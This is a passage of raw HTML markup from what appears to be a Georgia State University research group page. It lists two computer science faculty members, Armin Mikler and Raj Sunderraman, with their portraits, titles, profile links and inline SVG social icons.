0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=C5PVPkoAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c10-outer\">\n            <div data-colibri-id=\"182-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c11\" class=\"d-block style-978 style-local-182-c11 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Portrait-1-1.jpeg\" class=\"wp-image-1648 style-978-image style-local-182-c11-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-978-frameImage style-local-182-c11-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c12\" class=\"h-global-transition-all h-heading style-974 style-local-182-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c12\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Armin Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c13\" class=\"h-text h-text-component style-975 style-local-182-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p> Chair and Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c14\" class=\"h-text h-text-component style-976 style-local-182-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c15\" class=\"style-979 style-local-182-c15 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=41ckZZsAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c16-outer\">\n            <div data-colibri-id=\"182-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c17\" class=\"d-block style-980 style-local-182-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/sunderraman1.jpeg\" class=\"wp-image-692 style-980-image style-local-182-c17-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-980-frameImage style-local-182-c17-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c18\" class=\"h-global-transition-all h-heading style-974 style-local-182-c18 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c18\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raj Sunderraman</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c19\" class=\"h-text h-text-component style-975 style-local-182-c19 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Chair and Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c20\" class=\"h-text h-text-component style-976 style-local-182-c20 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c21\" class=\"style-981 style-local-182-c21 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/raj-sunderraman-a5591bb2/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/raj-sunderraman/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?hl=en&amp;user=Wlxc9FEAAAAJ\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 